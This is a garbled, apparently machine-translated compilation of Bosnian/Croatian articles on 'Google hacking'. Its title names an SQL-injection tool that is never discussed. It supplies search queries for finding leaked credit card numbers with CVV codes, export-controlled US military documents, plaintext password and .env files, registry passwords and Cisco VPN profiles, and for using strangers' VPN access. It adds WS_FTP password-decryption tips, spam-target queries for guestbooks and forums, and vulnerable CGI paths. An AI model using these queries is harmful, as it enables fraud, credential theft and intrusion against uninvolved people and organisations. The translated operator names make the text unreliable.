Upute za korištenje jSQL Injection, multifunkcionalnog alata za pronalaženje i iskorištavanje SQL injekcija u Kali Linuxu. Korištenje Googleovih malo poznatih funkcija za pronalaženje skrivenih upotreba Googlea kao CGI skenera

Primanje privatnih podataka ne znači uvijek hakovanje - ponekad se objavljuje u javni pristup. Znanje Google postavke a malo domišljatosti će vam omogućiti da pronađete mnogo zanimljivih stvari - od brojeva kreditnih kartica do FBI dokumenata.

UPOZORENJE

Sve informacije su date samo u informativne svrhe. Ni uredništvo ni autor nisu odgovorni za bilo kakvu moguću štetu uzrokovanu materijalima ovog članka.

Danas je sve povezano s internetom, malo se brine o ograničavanju pristupa. Stoga mnogi privatni podaci postaju plijen pretraživača. Spider roboti više nisu ograničeni na web stranice, već indeksiraju sav sadržaj dostupan na webu i stalno dodaju povjerljive informacije u svoje baze podataka. Naučiti ove tajne je lako - samo trebate znati kako pitati o njima.

Tražim fajlove

U sposobnim rukama, Google će brzo pronaći sve što je loše na webu, poput ličnih podataka i datoteka za službenu upotrebu. Često su skriveni poput ključa ispod tepiha: nema stvarnih ograničenja pristupa, podaci samo leže na poleđini stranice, kamo linkovi ne vode. Google-ov standardni web interfejs pruža samo osnovna podešavanja napredna pretraga, ali i oni će biti dovoljni.

Postoje dva operatora koja možete koristiti da ograničite Google pretraživanja na datoteke određenog tipa: filetype i ext. Prvi postavlja format koji pretraživač određuje zaglavljem datoteke, drugi - ekstenziju datoteke, bez obzira na njen interni sadržaj. Kada pretražujete u oba slučaja, morate navesti samo ekstenziju. U početku, ext operator je bio zgodan za upotrebu u slučajevima kada nije bilo posebnih funkcija formata za datoteku (na primjer, za traženje ini i cfg konfiguracijskih datoteka, koje mogu sadržavati bilo šta). Sad Google algoritmi promijenjen, a nema vidljive razlike između operatora - rezultati su u većini slučajeva isti.


Filtriranje izlaza

Prema zadanim postavkama, Google traži riječi i općenito sve znakove unesene u sve datoteke na indeksiranim stranicama. Možete ograničiti opseg pretraživanja domenom najviše razine, određenom web lokacijom ili lokacijom željenog niza u samim datotekama. Za prve dvije opcije koristi se izjava o web lokaciji, nakon čega slijedi naziv domene ili odabrane stranice. U trećem slučaju, čitav skup operatora vam omogućava da tražite informacije u poljima usluge i metapodacima. Na primjer, allinurl će pronaći navedeno u tijelu samih linkova, allinanchor - u tekstu koji se nalazi uz tag , allintitle - u zaglavljima stranice, allintext - u tijelu stranica.

Za svakog operatera postoji lakša verzija sa kraćim imenom (bez prefiksa all). Razlika je u tome što će allinurl pronaći veze sa svim riječima, dok će inurl pronaći veze samo sa prvom od njih. Druga i sljedeće riječi iz upita mogu se pojaviti bilo gdje na web stranicama. Operator inurl se također razlikuje od drugog sličnog po značenju - site. Prvi vam takođe omogućava da pronađete bilo koji niz znakova u linku do željenog dokumenta (na primer, /cgi-bin/), koji se široko koristi za pronalaženje komponenti sa poznatim ranjivostima.

Hajde da probamo u praksi. Uzimamo filter allintext i tjeramo upit da vrati listu brojeva kreditnih kartica i verifikacionih kodova, koji će isteći tek nakon dvije godine (ili kada se vlasnici umore od hranjenja svih za redom).

Allintext: datum isteka broja kartice /2017 cvv

Kada na vijestima pročitate da je mladi haker „provalio u servere“ Pentagona ili NASA-e, kradući povjerljive podatke, onda se u većini slučajeva radi upravo o ovoj elementarnoj tehnici korištenja Gugla. Pretpostavimo da nas zanima lista NASA-inih zaposlenika i njihove kontakt podatke. Svakako da je takva lista u elektronskom obliku. Radi praktičnosti ili zbog previda, može se nalaziti i na samoj web stranici organizacije. Logično je da u ovom slučaju neće biti referenci na njega, jer je namijenjen za internu upotrebu. Koje riječi mogu biti u takvom fajlu? Najmanje - polje "adresa". Lako je testirati sve ove pretpostavke.


inurl:nasa.gov tip datoteke:xlsx "adresa"


Koristimo birokratiju

Takvi nalazi su ugodna sitnica. Zaista solidan ulov dolazi iz detaljnijeg poznavanja Google Webmaster Operatora, samog Weba i strukture onoga što tražite. Poznavajući detalje, lako možete filtrirati izlaz i precizirati svojstva datoteka koje su vam potrebne kako biste dobili zaista vrijedne podatke u ostatku. Smiješno je da ovdje birokratija priskače u pomoć. Proizvodi tipične formulacije koje olakšavaju traženje tajnih informacija koje su slučajno procurile na web.

Na primjer, pečat izjave o distribuciji, koji je obavezan u uredu Ministarstva odbrane SAD-a, znači standardizirana ograničenja distribucije dokumenta. Slovo A označava javna saopštenja u kojima nema ništa tajno; B - namenjen samo za internu upotrebu, C - strogo poverljivo, i tako dalje do F. Posebno se nalazi slovo X koje označava posebno vredne podatke koji predstavljaju državnu tajnu najvišeg nivoa. Neka takvi dokumenti traže oni koji to treba da rade na dužnosti, a mi ćemo se ograničiti na fajlove sa slovom C. Prema DoDI 5230.24, takva oznaka se dodjeljuje dokumentima koji sadrže opis kritičnih tehnologija koje potpadaju pod kontrolu izvoza. Tako pažljivo čuvane informacije možete pronaći na sajtovima u domenu najvišeg nivoa .mil koji je dodeljen američkoj vojsci.

"IZJAVA O DISTRIBUCIJI C" inurl:navy.mil

Veoma je zgodno da se samo sajtovi Ministarstva odbrane SAD i njegovih ugovornih organizacija prikupljaju u domenu .mil. Rezultati pretraživanja ograničeni na domene su izuzetno čisti, a naslovi govore sami za sebe. Praktično je beskorisno tražiti ruske tajne na ovaj način: haos vlada u domenima .ru i .rf, a nazivi mnogih oružanih sistema zvuče kao botanički (PP "Kiparis", samohodne topove "Bagrem") ili čak fantastičan (TOS "Pinokio").


Pažljivim ispitivanjem bilo kog dokumenta sa sajta u domenu .mil, možete videti druge markere kako biste precizirali pretragu. Na primjer, referenca na ograničenja izvoza "Sec 2751", koja je također zgodna za traženje zanimljivih tehničkih informacija. S vremena na vrijeme se uklanja sa službenih stranica, gdje se nekada pojavio, pa ako ne možete pratiti zanimljiv link u rezultatima pretrage, koristite Google cache (cache operator) ili web stranicu Internet Archive.

Penjemo se u oblake

Osim slučajno deklasificiranih dokumenata iz vladinih odjela, u Google cache-u povremeno se pojavljuju linkovi do ličnih datoteka iz Dropboxa i drugih servisa za pohranu podataka koji stvaraju "privatne" veze ka javno objavljenim podacima. Još je gore sa alternativnim i samostalnim uslugama. Na primjer, sljedeći upit pronalazi podatke svih Verizon klijenata koji imaju instaliran FTP server i koji aktivno koriste ruter na svom ruteru.

Allinurl:ftp://verizon.net

Sada ima više od četrdeset hiljada takvih pametnih ljudi, a u proljeće 2015. bilo ih je za red veličine više. Umjesto Verizon.net-a, možete zamijeniti ime bilo kojeg poznatog provajdera, a što je poznatiji, ulov može biti veći. Preko ugrađenog FTP servera možete vidjeti datoteke na vanjskom disku spojenom na ruter. Obično je ovo NAS za daljinski rad, lični oblak ili neka vrsta peer-to-peer preuzimanja datoteka. Sav sadržaj takvih medija indeksira Google i drugi pretraživači, tako da možete pristupiti datotekama pohranjenim na vanjskim diskovima putem direktne veze.

Peeping configs

Prije masovne migracije na oblake, jednostavni FTP serveri, koji također nisu imali ranjivosti, vladali su kao udaljena skladišta. Mnogi od njih su i danas aktuelni. Na primjer, popularni program WS_FTP Professional pohranjuje konfiguracijske podatke, korisničke račune i lozinke u datoteci ws_ftp.ini. Lako ga je pronaći i pročitati jer su svi unosi pohranjeni u običnom tekstu, a lozinke su šifrirane korištenjem Triple DES algoritma nakon minimalnog zamagljivanja. U većini verzija dovoljno je jednostavno odbaciti prvi bajt.

Dešifriranje takvih lozinki je jednostavno pomoću uslužnog programa WS_FTP Password Decryptor ili besplatnog web servisa.

Kada se govori o hakiranju proizvoljnog sajta, obično se misli na dobijanje lozinke iz evidencije i rezervnih kopija CMS ili konfiguracionih datoteka aplikacije za e-trgovinu. Ako znate njihovu tipičnu strukturu, lako možete naznačiti ključne riječi. Linije poput onih koje se nalaze u ws_ftp.ini su izuzetno česte. Na primjer, Drupal i PrestaShop uvijek imaju korisnički ID (UID) i odgovarajuću lozinku (pwd), a sve informacije se pohranjuju u datoteke sa ekstenzijom .inc. Možete ih tražiti ovako:

"pwd=" "UID=" ext:inc

Otkrivamo lozinke iz DBMS-a

U konfiguracijskim datotekama SQL servera, imena i adrese Email korisnici se pohranjuju u čistom tekstu, a umjesto lozinki upisuju se njihovi MD5 heševi. Njihovo dešifriranje, strogo govoreći, je nemoguće, ali možete pronaći podudaranje među poznatim parovima heš-lozinke.

Do sada postoje DBMS-ovi koji čak ne koriste heširanje lozinke. Konfiguracijske datoteke bilo koje od njih mogu se jednostavno pregledati u pretraživaču.

Intext:DB_PASSWORD tip datoteke:env

Pojavom Windows servera, mjesto konfiguracijskih datoteka dijelom je zauzeo registar. Možete pretraživati ​​njegove grane na potpuno isti način, koristeći reg kao tip datoteke. Na primjer, ovako:

Tip datoteke:reg HKEY_CURRENT_USER "Lozinka"=

Ne zaboravite očigledno

Ponekad je moguće doći do povjerljivih informacija uz pomoć podataka koje je Google slučajno otvorio i uhvatio. Idealna opcija je pronaći listu lozinki u nekom uobičajenom formatu. Sačuvajte informacije o nalogu u tekstualnu datoteku, Word dokument ili elektronski Excel tabela Mogu samo očajnici, ali ih uvijek ima dovoljno.

Tip datoteke:xls inurl:lozinka

S jedne strane, postoji mnogo sredstava za sprečavanje ovakvih incidenata. Potrebno je navesti odgovarajuća prava pristupa u htaccess-u, zakrpiti CMS, ne koristiti lijeve skripte i zatvoriti ostale rupe. Postoji i datoteka sa listom isključenja robots.txt, koja zabranjuje pretraživačima da indeksiraju datoteke i direktorije navedene u njoj. S druge strane, ako se struktura robots.txt na nekom serveru razlikuje od standardne, onda odmah postaje jasno šta na njoj pokušavaju da sakriju.

Listi direktorija i datoteka na bilo kojoj stranici prethodi standardni natpis indeks. Budući da se mora pojaviti u naslovu u svrhu usluge, ima smisla ograničiti njegovu pretragu na operator naslova. Zanimljive stvari se mogu naći u direktorijumima /admin/, /personal/, /etc/ pa čak i /secret/.

Pratite ažuriranja

Relevantnost je ovdje izuzetno važna: stare ranjivosti se vrlo sporo zatvaraju, ali Google i njegovi rezultati pretraživanja se stalno mijenjaju. Postoji čak i razlika između filtera "poslednje sekunde" (&tbs=qdr:s na kraju URL-a zahtjeva) i filtera "u stvarnom vremenu" (&tbs=qdr:1).

Vremenski raspon datuma najnovije ažuriranje Googleov fajl je također implicitno naznačen. Preko grafičkog web sučelja možete odabrati jedan od tipičnih perioda (sat, dan, sedmica i tako dalje) ili postaviti raspon datuma, ali ovaj metod nije prikladan za automatizaciju.

Iz izgleda adresne trake, može se samo nagađati način da se ograniči izlaz rezultata korištenjem &tbs=qdr: konstrukcije. Slovo y iza njega navodi ograničenje od jedne godine (&tbs=qdr:y), m prikazuje rezultate za posljednji mjesec, w za sedmicu, d za prošli dan, h za posljednji sat, n za minut, i dajte mi sekundu. Najnoviji rezultati koji su upravo poznati Googleu nalaze se pomoću &tbs=qdr:1 filtera.

Ako trebate napisati zeznutu skriptu, bit će korisno znati da je raspon datuma postavljen u Googleu u julijanskom formatu putem operatora raspona datuma. Na primjer, ovako možete pronaći listu PDF dokumenata sa riječju povjerljivo otpremljenih između 1. januara i 1. jula 2015.

Povjerljivi tip datoteke:pdf daterange:2457024-2457205

Raspon je naveden u julijanskom formatu datuma bez decimala. Nezgodno ih je prevoditi ručno iz gregorijanskog kalendara. Lakše je koristiti konvertor datuma.

Ponovno ciljanje i filtriranje

Pored navođenja dodatnih operatora u upitu za pretraživanje, oni se mogu poslati direktno u tijelo veze. Na primjer, karakteristika filetype:pdf odgovara konstrukciji as_filetype=pdf. Stoga je zgodno postaviti bilo kakva pojašnjenja. Recimo da se izlaz rezultata samo iz Republike Honduras postavlja dodavanjem konstrukcije cr=countryHN URL-u pretrage, ali samo iz grada Bobruisk - gcs=Bobruisk . Pogledajte odjeljak za programere za kompletnu listu .

Google-ovi alati za automatizaciju dizajnirani su da olakšaju život, ali često povećavaju gnjavažu. Na primjer, korisnikov grad je određen IP-om korisnika putem WHOIS-a. Na osnovu ovih informacija, Google ne samo da balansira opterećenje između servera, već i mijenja rezultate pretraživanja. Ovisno o regiji, za isti upit, različiti rezultati će doći do prve stranice, a neki od njih mogu se pokazati potpuno skrivenim. Osjećate se kao kosmopolita i u potrazi za informacijama iz bilo koje zemlje pomoći će njen dvoslovni kod nakon direktive gl=country. Na primjer, kod Holandije je NL, dok Vatikan i Sjeverna Koreja nemaju svoj kod u Guglu.

Često su rezultati pretraživanja pretrpani čak i nakon korištenja nekoliko naprednih filtera. U ovom slučaju, lako je precizirati upit dodavanjem nekoliko riječi izuzetaka (svakoj od njih prethodi znak minus). Na primjer, bankarstvo, imena i tutorial se često koriste uz riječ Personal. Stoga, jasniji rezultati pretraživanja neće pokazati primjer upita iz udžbenika, već rafinirani:

Naslov:"Indeks /Personal/" -nazivi -vodič -bankarstvo

Poslednji primer

Sofisticiranog hakera odlikuje činjenica da sam sebi obezbjeđuje sve što mu je potrebno. Na primjer, VPN je zgodna stvar, ali skupa ili privremena i s ograničenjima. Registrirati se samo za sebe je preskupo. Dobro je da postoje grupne pretplate, ali sa Google Lako je biti dio grupe. Da biste to učinili, samo pronađite Cisco VPN konfiguracijsku datoteku, koja ima prilično nestandardnu ​​ekstenziju PCF-a i prepoznatljivu putanju: Program Files\Cisco Systems\VPN Client\Profiles . Jedan zahtjev, i pridružite se, na primjer, ljubaznom osoblju Univerziteta u Bonu.

Tip datoteke:pcf vpn ILI grupa

INFO

Google pronalazi konfiguracijske datoteke s lozinkama, ali mnoge od njih su šifrirane ili zamijenjene hashovima. Ako vidite nizove fiksne dužine, odmah potražite uslugu dešifriranja.

Lozinke su pohranjene u šifriranom obliku, ali Maurice Massard je već napisao program za njihovo dešifriranje i pruža ga besplatno putem thecampusgeeks.com.

Uz pomoć Google-a izvode se stotine različitih vrsta napada i testova penetracije. Postoji mnogo opcija koje utiču na popularne programe, glavne formate baza podataka, brojne ranjivosti PHP-a, oblake i tako dalje. Znajući šta tačno tražite, znatno je lakše doći do informacija koje su vam potrebne (naročito do informacija koje niste namjeravali objaviti). No Shodan single hrani zanimljive ideje, ali bilo koja baza podataka indeksiranih mrežnih resursa!

Kako pretraživati ​​koristeći google.com

Vjerovatno svi znaju da koriste tražilicu kao što je Google =) Ali ne znaju svi to ako pravilno komponujete upit za pretragu uz pomoć posebnih dizajna možete mnogo efikasnije i brže postići rezultate onoga što tražite =) U ovom članku pokušat ću pokazati šta i kako trebate učiniti da biste pretraživali ispravno

Google podržava nekoliko naprednih operatora pretraživanja koji imaju posebno značenje prilikom pretraživanja na google.com. Tipično, ovi operateri modificiraju pretragu, ili čak govore Googleu da radi potpuno različite vrste pretraživanja. Na primjer, konstrukcija veza: je specijalni operator, a upit link:www.google.com neće vam dati normalnu pretragu, već će umjesto toga pronaći sve web stranice koje imaju veze na google.com.
alternativni tipovi zahtjeva

skladiste: Ako u upit uključite druge riječi, Google će istaknuti te riječi unutar keširanog dokumenta.
Na primjer, cache: www.web stranicaće prikazati keširani sadržaj sa istaknutom riječju "web".

veza: gornji upit za pretraživanje će prikazati web stranice koje sadrže veze na navedeni upit.
Na primjer: link: www.websiteće prikazati sve stranice koje imaju link na http://www.site

povezano: Prikazuje web stranice koje su "povezane" sa navedenom web stranicom.
Na primjer, povezano: www.google.comće navesti web stranice koje su slične početna stranica Google.

info: Zatraži informacije: pružit će neke informacije koje Google ima o traženoj web stranici.
Na primjer, info:websiteće prikazati informacije o našem forumu =) (Armada - Forum odraslih webmastera).

Ostali zahtjevi za informacijama

definirati: Upit define: će dati definiciju riječi koje upišete nakon ovoga, kompajlirane iz različitih izvora na mreži. Definicija će biti za cijelu unesenu frazu (to jest, uključit će sve riječi u tačnom upitu).

dionice: Ako započnete upit s dionicama: Google će ostale uvjete upita tretirati kao dionice i povezati se na stranicu koja prikazuje pripremljene informacije za te znakove.
Na primjer, dionice: intel yahooće prikazati informacije o Intelu i Yahoou. (Imajte na umu da morate ispisati znakove udarnih vijesti, a ne naziv kompanije)

Modifikatori zahtjeva

stranica: Ako u svoj upit uključite site:, Google će ograničiti rezultate na web stranice koje pronađe u toj domeni.
Također možete tražiti pojedinačne zone, kao što su ru, org, com, itd ( site:com site:ru)

allintitle: Ako pokrenete upit sa allintitle:, Google će ograničiti rezultate sa svim riječima upita u naslovu.
Na primjer, allintitle: google pretragaće vratiti sve stranice Google pretraživanja kao što su slike, blog, itd

naslov: Ako u svoj upit uključite intitle:, Google će ograničiti rezultate na dokumente koji sadrže tu riječ u naslovu.
Na primjer, naslov: Posao

allinurl: Ako pokrenete upit sa allinurl: Google će ograničiti rezultate sa svim riječima upita u URL-u.
Na primjer, allinurl: google pretragaće vratiti dokumente sa google i pretražiti u naslovu. Također, kao opciju, možete razdvojiti riječi kosom crtom (/) tada će riječi s obje strane kose crte biti pretraživane na istoj stranici: Primjer allinurl: foo/bar

inurl: Ako u svoj upit uključite inurl:, Google će ograničiti rezultate na dokumente koji sadrže tu riječ u URL-u.
Na primjer, Animacija inurl:website

tekst: traži samo u tekstu stranice navedenu riječ, zanemarujući naslov i tekstove linkova i druge stvari koje nisu povezane. Postoji i izvedenica ovog modifikatora - allintext: one. dalje, sve riječi u upitu će se pretraživati ​​samo u tekstu, što je također važno, zanemarujući često korištene riječi u linkovima
Na primjer, intext:forum

raspon datuma: pretraživanja u vremenskim okvirima (daterange:2452389-2452389), datumi za vrijeme su navedeni u julijanskom formatu.

Pa, i sve vrste zanimljivih primjera zahtjeva

Primjeri sastavljanja upita za Google. Za spamere

inurl:control.guest?a=sign

Site:books.dreambook.com “URL početne stranice” “Potpiši moj” inurl:sign

Sajt: www.freegb.net Početna stranica

Inurl:sign.asp "Broj znakova"

"Poruka:" inurl:sign.cfm "Pošiljalac:"

inurl:register.php “Registracija korisnika” “Website”

Inurl:edu/knjiga gostiju “Upišite se u knjigu gostiju”

Inurl:objavi "Objavi komentar" "URL"

Inurl:/archives/ “Komentari:” “Sjećate se informacija?”

“Skriptu i knjigu gostiju Kreirao:” “URL:” “Komentari:”

inurl:?action=add “phpBook” “URL”

Naslov: "Pošalji novu priču"

Časopisi

inurl:www.livejournal.com/users/mode=reply

inurl greatestjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

inurl:fastbb.ru /re.pl? "Knjiga gostiju"

Blogovi

Inurl:blogger.com/comment.g?postID”"anonymous"

Inurl:typepad.com/ “Objavite komentar” “Zapamtite lične podatke?”

Inurl:greatestjournal.com/community/ “Objavi komentar” “adrese anonimnih postera”

“Ostavite komentar” “adrese anonimnih postera” -

Naslov: "Objavi komentar"

Inurl:pirillo.com “Objavi komentar”

Forumi

Inurl:gate.html?”name=Forumi” “mode=reply”

inurl:”forum/posting.php?mode=reply”

inurl:”mes.php?”

inurl:”members.html”

inurl:forum/memberlist.php?”

Hakovanje sa Google-om

Aleksandar Antipov

Sistem pretraživanja Google (www.google.com) nudi mnoge opcije pretraživanja. Sve ove karakteristike su neprocjenjiv alat za pretraživanje za prvog korisnika Interneta i u isto vrijeme još moćnije oružje invazije i uništenja u rukama ljudi sa zlim namjerama, uključujući ne samo hakere, već i neračunarske kriminalce. pa čak i terorista.
(9475 pregleda u 1 sedmici)


Denis Batrankov
denisNOSPAMixi.ru

pažnja:Ovaj članak nije vodič za akciju. Ovaj članak je pisan za vas, administratore WEB servera, kako biste izgubili lažni osjećaj da ste sigurni i konačno shvatili podmuklost ovakvog načina pribavljanja informacija i krenuli u zaštitu svoje stranice.

Uvod

Na primjer, pronašao sam 1670 stranica za 0,14 sekundi!

2. Unesite drugi red, na primjer:

inurl:"auth_user_file.txt"

malo manje, ali ovo je već dovoljno za besplatno preuzimanje i za pogađanje lozinki (koristeći isti John The Ripper). U nastavku ću dati još nekoliko primjera.

Dakle, morate shvatiti da je Google pretraživač posjetio većinu internet stranica i keširao informacije koje se nalaze na njima. Ove keširane informacije vam omogućavaju da dobijete informacije o web-mjestu i sadržaju stranice bez direktne veze s web-mjestom, samo kopanjem po informacijama koje interno pohranjuje Google. Štoviše, ako informacije na web-mjestu više nisu dostupne, informacije u predmemoriji mogu i dalje biti sačuvane. Sve što je potrebno za ovu metodu je poznavanje nekih Google ključnih riječi. Ova tehnika se zove Google Hacking.

Prvi put su se informacije o Google Hackingu pojavile na Bugtruck mailing listi prije 3 godine. Ovu temu je 2001. pokrenuo francuski student. Evo veze do ovog pisma http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Daje se prvi primjeri takvih zahtjeva:

1) Indeks /admin
2) Indeks /password
3) Indeks /mail
4) Indeks / +banques +filetype:xls (za francusku...)
5) Indeks / +passwd
6) Indeks/password.txt

Ova tema je nedavno napravila veliku buku u dijelu interneta koji čita engleski jezik: nakon članka Johnnyja Longa objavljenog 7. maja 2004. Za potpuniju studiju Google Hackinga, savjetujem vam da odete na stranicu ovog autora http://johnny.ihackstuff.com. U ovom članku samo vas želim obavijestiti o novostima.

Ko to može koristiti:
- Novinari, špijuni i svi oni koji vole da zabadaju nos u tuđe poslove mogu to iskoristiti za traženje kompromitujućih dokaza.
- Hakeri traže pogodne mete za hakovanje.

Kako Google funkcionira.

Da nastavite razgovor, da vas podsjetim na neke od ključnih riječi koje se koriste u Google upitima.

Pretražujte pomoću znaka +

Google isključuje nebitne, po njegovom mišljenju, riječi iz pretrage. Na primjer, upitne riječi, prijedlozi i članovi u engleski jezik: na primjer su, od, gdje. Čini se da na ruskom Google sve riječi smatra važnim. Ako je riječ isključena iz pretrage, Google piše o njoj. Da bi Google počeo tražiti stranice sa ovim riječima, potrebno je da ispred njih dodate znak + bez razmaka ispred riječi. Na primjer:

as + od baze

Traži po znaku -

Ako Google pronađe veliki broj stranice sa kojih želite da isključite stranice s određenim temama, možete natjerati Google da traži samo stranice koje ne sadrže određene riječi. Da biste to učinili, trebate naznačiti ove riječi tako što ćete staviti znak ispred svake - bez razmaka ispred riječi. Na primjer:

ribolov - votka

Tražite sa znakom ~

Možda ćete želeti da potražite ne samo navedenu reč, već i njene sinonime. Da biste to učinili, ispred riječi stavite simbol ~.

Pronalaženje tačne fraze pomoću dvostrukih navodnika

Google pretražuje na svakoj stranici sva pojavljivanja riječi koje ste napisali u nizu upita i ne brine o relativnom položaju riječi, glavna stvar je da se sve navedene riječi nalaze na stranici u isto vrijeme ( ovo je zadana radnja). Naći tacna fraza- mora biti stavljeno pod navodnike. Na primjer:

"držač za knjige"

Da biste imali barem jednu od navedenih riječi, morate navesti logička operacija eksplicitno: ILI. Na primjer:

knjiga sigurnost ILI zaštita

Osim toga, možete koristiti znak * u nizu za pretraživanje da označite bilo koju riječ i. da predstavlja bilo koji lik.

Pronalaženje riječi s dodatnim operatorima

Postoje operatori pretraživanja koji su navedeni u nizu za pretraživanje u formatu:

operator:pojam_traži

Razmaci pored debelog creva nisu potrebni. Ako umetnete razmak iza dvotačke, vidjet ćete poruku o grešci, a prije nje Google će ih koristiti kao normalni niz za pretraživanje.
Postoje grupe dodatnih operatora pretraživanja: jezici - naznačite na kojem jeziku želite da vidite rezultat, datum - ograničite rezultate za posljednja tri, šest ili 12 mjeseci, pojavljivanja - označite gdje u dokumentu trebate tražiti string: svuda, u naslovu, u URL-u, domeni - potražite navedenu stranicu ili obrnuto isključite je iz pretraživanja, Sigurna pretraga- blokirati stranice koje sadrže navedenu vrstu informacija i ukloniti ih sa stranica s rezultatima pretraživanja.
Međutim, nekim operaterima nije potreban dodatni parametar, na primjer, upit " cache: www.google.com" može se nazvati kao puni niz za pretraživanje, a neke ključne riječi, naprotiv, zahtijevaju riječ za pretraživanje, na primjer " web stranica:www.google.com pomoć U svjetlu naše teme, pogledajmo sljedeće izjave:

Operater

Opis

Zahtijeva dodatni parametar?

tražite samo web lokaciju navedenu u search_term

pretražujte samo u dokumentima sa tipom search_term

pronaći stranice koje sadrže pojam za pretraživanje u naslovu

pronađite stranice koje sadrže sve riječi search_term u naslovu

pronađite stranice koje sadrže riječ search_term u svojoj adresi

pronađite stranice koje sadrže sve riječi search_term u svojoj adresi

Operater stranica: ograničava pretragu samo na navedenu lokaciju, a možete odrediti ne samo Ime domena ali i IP adresu. Na primjer, unesite:

Operater vrsta datoteke: ograničava pretragu na datoteke određenog tipa. Na primjer:

Od datuma ovog članka, Google može pretraživati ​​unutar 13 različitih formata datoteka:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus Word Pro (lwp)
  • MacWrite(mw)
  • Microsoft Excel(xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word(dok)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Format obogaćenog teksta (rtf)
  • Shockwave Flash (swf)
  • Tekst (ans, txt)

Operater veza: prikazuje sve stranice koje upućuju na navedenu stranicu.
Uvijek mora biti zanimljivo vidjeti koliko mjesta na internetu zna za vas. pokušavamo:

Operater skladiste: prikazuje Google keširanu verziju stranice kako je izgledala kada google najnoviji jednom posjetio ovu stranicu. Uzimamo bilo koju stranicu koja se često mijenja i gledamo:

Operater naslov: traži navedenu riječ u naslovu stranice. Operater allintitle: je ekstenzija - traži svih navedenih nekoliko riječi u naslovu stranice. uporedi:

naslov: let na mars
intitle:flight intitle:on intitle:mars
allintitle: let na mars

Operater inurl: uzrokuje da Google prikaže sve stranice koje sadrže navedeni niz u URL-u. allinurl: traži sve riječi u URL-u. Na primjer:

allinurl:acid_stat_alerts.php

Ova komanda je posebno korisna za one koji nemaju SNORT - barem mogu vidjeti kako funkcionira na stvarnom sistemu.

Google metode hakiranja

Dakle, otkrili smo da, koristeći kombinaciju gore navedenih operatora i ključnih riječi, svako može prikupiti potrebne informacije i potražiti ranjivosti. Ove tehnike se često nazivaju Google Hacking.

Mapa sajta

Možete koristiti site: izjavu da vidite sve linkove koje je Google pronašao na stranici. Obično se stranice koje su dinamički kreirane skriptama ne indeksiraju pomoću parametara, tako da neke stranice koriste ISAPI filtere tako da veze nisu u obliku /article.asp?num=10&dst=5, ali sa kosim crtama /article/abc/num/10/dst/5. Ovo se radi kako bi se osiguralo da je web stranica općenito indeksirana od strane pretraživača.

Pokusajmo:

site:www.whitehouse.gov Whitehouse

Google misli da svaka stranica na web stranici sadrži riječ whitehouse. Ovo je ono što koristimo da dobijemo sve stranice.
Postoji i pojednostavljena verzija:

site:whitehouse.gov

A najbolje je to što drugovi iz whitehouse.gov nisu ni znali da smo pogledali strukturu njihovog sajta i čak pogledali keširane stranice koje je Google preuzeo za sebe. Ovo se može koristiti za proučavanje strukture stranica i pregledavanje sadržaja, a da se za sada ne primijeti.

Ispis datoteka u direktorijima

WEB serveri mogu prikazati liste serverskih direktorija umjesto uobičajenih HTML stranice. To se obično radi tako da korisnici izaberu i preuzmu određene datoteke. Međutim, u mnogim slučajevima administratori nemaju namjeru prikazati sadržaj direktorija. Ovo se dešava zbog neispravne konfiguracije servera ili nedostatka početna stranica u imeniku. Kao rezultat toga, haker ima priliku pronaći nešto zanimljivo u imeniku i koristiti ga za svoje potrebe. Da biste pronašli sve takve stranice, dovoljno je primijetiti da sve sadrže riječi: index of u svom naslovu. Ali pošto indeks riječi ne sadrži samo takve stranice, moramo precizirati upit i uzeti u obzir ključne riječi na samoj stranici, pa upiti poput:

intitle:index.of roditeljski direktorij
intitle:index.of naziv veličine

Budući da je većina popisa direktorija namjerna, možda ćete imati teškoća da prvi put pronađete pogrešno postavljene liste. Ali barem ćete moći koristiti liste da odredite verziju WEB servera, kao što je opisano u nastavku.

Preuzimanje verzije WEB servera.

Poznavanje verzije WEB servera uvijek je od pomoći prije početka bilo kakvog hakerskog napada. Opet zahvaljujući Google-u moguće je dobiti ove informacije bez povezivanja na server. Ako pažljivo pogledate listu direktorija, možete vidjeti da je tamo prikazano ime WEB servera i njegova verzija.

Apache1.3.29 - ProXad Server na trf296.free.fr Port 80

Iskusan administrator može promijeniti ove podatke, ali je, po pravilu, istinito. Dakle, da biste dobili ove informacije, dovoljno je poslati zahtjev:

intitle:index.of server.at

Da bismo dobili informacije za određeni server, preciziramo zahtjev:

intitle:index.of server.at site:ibm.com

Ili obrnuto, tražimo servere koji rade na određenoj verziji servera:

intitle:index.of Apache/2.0.40 Server na

Ovu tehniku ​​može koristiti haker da pronađe žrtvu. Ako, na primjer, ima exploit za određenu verziju WEB servera, onda ga može pronaći i isprobati postojeći exploit.

Verziju servera možete dobiti i tako što ćete pogledati stranice koje su podrazumevano instalirane kada instalirate novu verziju WEB servera. Na primjer, da biste vidjeli probnu stranicu Apache 1.2.6, samo otkucajte

intitle:Test.Page.for.Apache it.worked!

Štaviše, neki operativni sistemi odmah instaliraju i pokreću WEB server tokom instalacije. Međutim, neki korisnici toga nisu ni svjesni. Naravno, ako vidite da neko nije obrisao podrazumevanu stranicu, onda je logično pretpostaviti da računar uopšte nije bio podvrgnut nikakvoj konfiguraciji i da je verovatno ranjiv na napade.

Pokušajte potražiti IIS 5.0 stranice

allintitle:Dobro došli u Windows 2000 Internet usluge

U slučaju IIS-a, možete odrediti ne samo verziju servera, već i Windows verzija i servisni paket.

Drugi način da odredite verziju WEB servera je da potražite priručnike (stranice pomoći) i primjere koji se standardno mogu instalirati na web-mjestu. Hakeri su pronašli dosta načina da koriste ove komponente za dobijanje privilegovanog pristupa sajtu. Zbog toga morate ukloniti ove komponente na proizvodnom mjestu. Da ne spominjemo činjenicu da prisustvom ovih komponenti možete dobiti informacije o tipu servera i njegovoj verziji. Na primjer, pronađimo priručnik za apache:

inurl: ručni moduli apache direktiva

Korištenje Googlea kao CGI skenera.

CGI skener ili WEB skener je uslužni program za traženje ranjivih skripti i programa na serveru žrtve. Ovi uslužni programi moraju znati što tražiti, za to imaju čitavu listu ranjivih datoteka, na primjer:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

